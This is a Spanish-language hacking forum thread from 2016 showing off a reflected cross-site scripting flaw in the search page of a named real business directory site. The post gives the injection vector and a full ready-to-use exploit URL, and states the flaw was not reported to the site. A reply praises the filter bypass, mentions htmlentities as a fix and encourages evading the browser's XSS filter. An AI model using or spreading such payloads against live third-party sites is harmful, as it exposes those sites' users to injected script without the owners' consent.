Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Topic started by: rreedd on December 18, 2016, 08:12:15 pm

Title: [XSS] www.iglobal.co
Post by: rreedd on December 18, 2016, 08:12:15 pm
Sitio : https://www.iglobal.co

Descripción del sitio
: "iGlobal es un directorio online de negocios y profesionales de 60 paises del mundo" (iglobal.co)
 
   [XSS] Inyección en URL .

(https://fotos.subefotos.com/be1769317477630b50ae004dd0086258o.png)


  Url del sitio : https://www.iglobal.co/uruguay/search/
  Vector :  "+<h1+onclick%3D(alert('underc0de'))>sqli<%2Fh1>
  Exploit : https://www.iglobal.co/uruguay/search/"+<h1+onclick%3D(alert('underc0de'))>sqli<%2Fh1> (https://www.iglobal.co/uruguay/search/"+<h1+onclick%3D(alert('underc0de'))>sqli<%2Fh1>)
  Reportado : NO
  Autor : RREEDD
Title: Re: [XSS] www.iglobal.co
Post by: GGZ on December 19, 2016, 12:40:57 am
Jajaja, buen XSS, salteaste el filtro que tenía.

Hablando de esos filtros, ¿no es mejor directamente usar htmlentities?, que todo ese filtro que al final siempre se lo termina salteando la mayoría de veces.

Ahora te queda saltear el filtro de Google Chrome

Saludos!